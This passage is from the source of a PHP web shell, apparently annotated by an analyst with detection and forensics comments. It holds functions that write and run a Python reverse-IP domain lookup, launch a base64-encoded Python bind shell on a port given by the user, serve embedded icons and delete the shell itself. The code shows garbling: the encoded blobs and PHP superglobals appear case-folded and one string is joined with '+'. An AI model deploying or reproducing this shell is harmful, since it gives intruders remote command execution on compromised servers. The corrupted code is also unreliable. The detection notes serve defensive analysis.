// deletes the script. Detection: python spawned by the web server, a transient lookup.py in the document
// root, and outbound HTTP to the service named in the script.
$script = "import urllib, urllib2, sys, re
req = urllib2.request('http://www.seologs.com/ip-domains.html',
urllib.urlencode({'domainname' : sys.argv[1]}))
site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
for i in xrange(0,len(site)): print site[i]"; // my sexy python script
$handle = fopen('lookup.py', 'w');
@fwrite($handle, $script);
@fclose($handle);
echo("<h4>domains</h4>");
echo("<ul>");
$cmd = exec("python lookup.py $servinf[0]", $ret);
foreach($ret as $site) echo("<li>$site\n");
echo("</ul>");
@unlink('lookup.py');
}

function bshell(){ // python bindshell script


style();
// Asks for a port (default 5001), then writes base64_decode($script) to b.py, runs "python b.py <port>"
// and deletes the file. The author describes the payload as a Python bind shell; the blob below appears
// case-folded in this listing, so it does not decode here. Detection: b.py created in the document root,
// python started by the web server and, if the payload is what its name says, a new listening socket on
// the chosen port.
if(!@$_post['bport']){ ?>
<form method = post>
<b>port: </b>
<input type = 'text' name = 'bport' value = '5001'>
<input type = 'submit' value = 'bind'>
</form>
<?php
die();
}
$script =
"iyevdxnyl2jpbi9lbnyvchl0ag9udqppbxbvcnqgc3lzlhnvy2tldcxvcw0kzgvmigjpbmrtzshwb3j0k
tonciagcy
a9ihnvy2tldc5zb2nrzxqoc29ja2v0lkfgx0lorvqsihnvy2tldc5tt0nlx1nuukvbtsknciagdhj5
og0kicagihmuymluzcgojyc
saw50khbvcnqpksknciagicbzlmxpc3rlbig1kq0kicblegnlchq6dqogicagc3lzlmv4axqoj0nhb
m5vdcbjcmvhdgugc29ja2v0
jyknciagdw4gpsbvcy5lbnzpcm9uwyjmt0doqu1fil0nciagawygdw4gpt0gj3jvb3qnoibwcm9tch
q9jyajiccnciagzwxzztogc
hjvbxb0pscgjcandqogihdoawxlifrydwu6dqogicagyywgzgv0ywlscya9ihmuywnjzxb0kckncia
gicbjlnnlbmqoildlbgnvbw
ugdg8gdghlihnlcnzlcia7kvxuu2hlbgwga2lsbcbjb21tyw5kiglzicdkawunllxuiiknciagicb3
aglszsbucnvlog0kicagica
gdhj5og0kicagicagicbjlnnlbmqodw4gkyanqccgkybzb2nrzxquz2v0ag9zdg5hbwuoksariccgj
yarig9zlmdldgn3zcgpicsg
chjvbxb0kq0kicagicagicbkyxqgpsbjlnjly3yonda5nikucnn0cmlwkcknciagicagicagawygzg
f0wza6ml0gpt0gj2nkjzonc
iagicagicagicbvcy5jagrpcihkyxrbmzpdkq0kicagicagicbpzibkyxrbmdozxsa9psanzglljzo
nciagicagicagicbvcy5wb3
blbigna2lsbcanicsgc3rykg9zlmdldhbpzcgpksknciagicagicagyy5zzw5kkg9zlnbvcgvukgrh
dckucmvhzcgplnjzdhjpccg
picsgj1xujyknciagicagigv4y2vwdcbzb2nrzxquzxjyb3i6dqogicagicagihmuy2xvc2uokq0ki
cagicagicbiaw5kbwuocg9y
dcknciagicbjlmnsb3nlkckncmlmig9zlmzvcmsoktonciagc3lzlmv4axqomckncmjpbmrtzshpbn
qoc3lzlmfyz3zbmv0pkq==";
$handle = fopen('b.py', 'w');
@fwrite($handle, base64_decode($script));
@fclose($handle);
exec("python b.py " + $_post['bport']);
@unlink("b.py");
}

function img($img){ // images function


// Serves one of the embedded base64 GIF icons (folder, image, unknown, binary, text, compressed, sound,
// script) selected by ?img=<name> with Content-Type image/gif, then exits. An unknown name yields an
// empty body. The blobs appear case-folded in this listing and would not decode to valid GIFs here.
$images = array(
"folder"=>"r0lgodlhewaqalmaaaaaap///5ycam7oy///np//zv/onpf39////waaaaaaaaaaaaa
aaaaaaaaaaaaaach5baeaaa" .
"galaaaaaatabaaaarremljq7046yp6bxsihevbeakycuprdp7hlxrdeomqcebp/4ychffzgqhh4yr
ypb2dolhpikwq" .
"d1pq8yrvvg3qyeh5ryk5rjfafuua3vb4fbibads=",
"image"=>"r0lgodlhfaawaomaap////8zm8z//8zmzjmzmwzmzmyaadmzmwczzaczmwazzgaaaaaa
aaaaaaaaaaaaach+tlroax" .
"mgyxj0iglzigluihrozsbwdwjsawmgzg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29
tlcbtzxb0zw1i" .
"zxigmtk5nqah+qqbaaacacwaaaaafaawaaaekpdisae4wbzau99hdm1esyyzwxyqogjblacdonryn
ssgsby/4gsx6y" .
"2oymwq2omqngslbjzlwbm1afsqkyu4a2twywumyt/wltsivgyga/zq3qwu7mmhvh4g8gusfauhch9
5nwmhv4sgh4ed" .
"ihoojy8rzpsveiv+mycwhncko6sfm5cliadqrk1pqbljsrnseqa7",
"unknown"=>"r0lgodlhfaawamiaap///8z//5mzmtmzmwaaaaaaaaaaaaaaach+tlroaxmgyxj0ig
lzigluihrozsbwdwjsawmgzg" .
"9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa
bacwaaaaafaaw" .
"aaadadi6vpewdecrnso+atvpeqciamgairhr5xmkgmq1lkomn7ecrjdwp52r0ippjj0kjuaq7sxle
+si+9v8vycfim" .
"0ilb2o80s8jcfvjjtagyrzypnby5ov6wolpd+xdjqagsq4eucgqqejads=",
"binary"=>"r0lgodlhfaawamiaap///8z//8zmzjmzmtmzmwaaaaaaaaaaach+tlroaxmgyxj0igl
zigluihrozsbwdwjsawmgzg" .
"9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa
bacwaaaaafaaw" .
"aaadaui6vpeweecrnss+wqoqxseae6lxxgeopqmha+q1rhtfakho/hadnvfo6lmykypkooadim4vj
dowkx2xvirugq" .
"vavcbuxcn0hke04znriv/roovag3+z63oyo6/uiwlkgyjjoxfdh4htcqa7",
"text"=>"r0lgodlhfaawaomaap/////mm/8zm8z//5mzmzlmm2bm/zmzmwaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaach+tlroax" .
"mgyxj0iglzigluihrozsbwdwjsawmgzg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29
tlcbtzxb0zw1i" .
"zxigmtk5nqah+qqbaaadacwaaaaafaawaaaeb/disee4ebzau99hdm1esybzwxekgi5sebg0+2hnt
bsccvhamgtxay" .
"cositwugg2pyqoqalhoz/qklvv6gkmqm8xxdumzx0yv5ze9s7jdpgtl3me5jhhts/xo3hwdwt0f31
7wwdsi4xrpxlw" .
"kugxeqa7",
"compressed"=>"r0lgodlhfaawaocaap//////zp//mf//zv//m///ap/m///mzp/mmf/mzv/mm//
map+z//+zzp+zmf+zzv+zm/+zap" .
"9m//9mzp9mmf9mzv9mm/9map8z//8zzp8zmf8zzv8zm/8zap8a//8azp8amf8azv8am/8aamz//8z
/zmz/mcz/zsz/" .
"m8z/amzm/8zmzmzmmczmzszmm8zmamyz/8yzzmyzmcyzzsyzm8yzamxm/8xmzmxmmcxmzsxmm8xma
mwz/8wzzmwzmc" .
"wzzswzm8wzamwa/8wazmwamcwazswam8waajn//5n/zjn/mzn/zpn/m5n/ajnm/5nmzjnmmznmzpn
mm5nmajmz/5mz" .
"zjmzmzmzzpmzm5mzajlm/5lmzjlmmzlmzplmm5lmajkz/5kzzjkzmzkzzpkzm5kzajka/5kazjkam
zkazpkam5kaag" .
"b//2b/zgb/mwb/zmb/m2b/agbm/2bmzgbmmwbmzmbmm2bmagaz/2azzgazmwazzmazm2azagzm/2z
mzgzmmwzmzmzm" .
"m2zmagyz/2yzzgyzmwyzzmyzm2yzagya/2yazgyamwyazmyam2yaadp//zp/zdp/mtp/zjp/mzp/a
dpm/zpmzdpmmt" .
"pmzjpmmzpmadoz/zozzdozmtozzjozmzozadnm/znmzdnmmtnmzjnmmznmadmz/zmzzdmzmtmzzjm
zmzmzadma/zma" .
"zdmamtmazjmamzmaaad//wd/zad/mqd/zgd/mwd/aadm/wdmzadmmqdmzgdmmwdmaacz/wczzaczm
qczzgczmwczaa" .
"bm/wbmzabmmqbmzgbmmwbmaaaz/wazzaazmqazzgazmwazaaaa/waazaaamqaazgaam+4aan0aals
aakoaaigaahca" .
"afuaaeqaaciaabeaaaduaaddaac7aacqaaciaab3aabvaabeaaaiaaaraaaa7gaa3qaauwaaqgaai
aaadwaavqaara" .
"aaigaaee7u7t3d3bu7u6qqqoiiihd3d1vvvurerciiihereqaaach+tlroaxmgyxj0iglzigluihr
ozsbwdwjsawmg" .
"zg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqba
aakacwaaaaafa" .
"awaaaimqbjcctbqmdbgqgtdmqfaabdvgojemzi0khehburwrwomgndihwnavjhiqrjjhx/qvz5d+v
hafziwmmz8bgh" .
"ji9hxqtj4zfamzc1vpxjgkppn0y5cp04m6lpekcn5mxojelrqfy5tm36ngrpqv67op0km6rynkup/
gmq1mdamc1tdn" .
"36lijupwjr0psofyurmtjlhitbkqxcgaa7",
"sound"=>"r0lgodlhfaawamiaap////8zm8z//8zmzjmzmwyaadmzmwaaach+tlroaxmgyxj0iglz
igluihrozsbwdwjsawmgzg" .
"9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa
cacwaaaaafaaw" .
"aaadayi63p4wnsnckoocyvwpb7fxfwmfwgh+dzpynndpnahcw9cvquj8tttrd+g5hmint7a0bpe4z
nf6hcqn0iryks" .
"0sdn9v0tsc0q4dq1shfrjebrq6fznn5co2jd4yfup7gnysexqlhbijigsjads=",
"script"=>"r0lgodlhfaawamiaap///8z//5mzmtmzmwaaaaaaaaaaaaaaach+tlroaxmgyxj0igl
zigluihrozsbwdwjsawmgzg" .
"9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa
bacwaaaaafaaw" .
"aaadzti6vpewdecrnso+atvpeddvirhvbjcsf8qrmiwobe2fvlrmcyz3o4pgkcdgvmgr0sgzoyvm0
dns/af7ggy1me" .
"16v9vxndynf89es2os00brcdw7dvddwe87fjmg+v9dnxbzyw8jads=");
header("content-type: image/gif");
echo(base64_decode($images[$img]));
die();
}

function kill(){ // shell deleter function


style();
// Self-removal: when POST ver equals "confirm", unlink()s this script (basename of php_self). $me is used
// in the form without a global declaration, so the action attribute is empty. Forensics note: the file
// leaves the disk but access logs, session files and anything it wrote (uploads, b.py, lookup.py) remain.
echo("<form method='post'>");
echo("type 'confirm' to kill the shell:<br>\n<input type='text' name='ver'
action='$me&act=kill'>");
echo("<input type='submit' value='delete'>");
echo("</form>");
if(@$_post['ver'] == "confirm"){
$self = basename($_server['php_self']);
if(unlink($self)) echo("deleted");
else echo("failed");
}
}
die(); // unconditional exit once the dispatcher above has run
?>
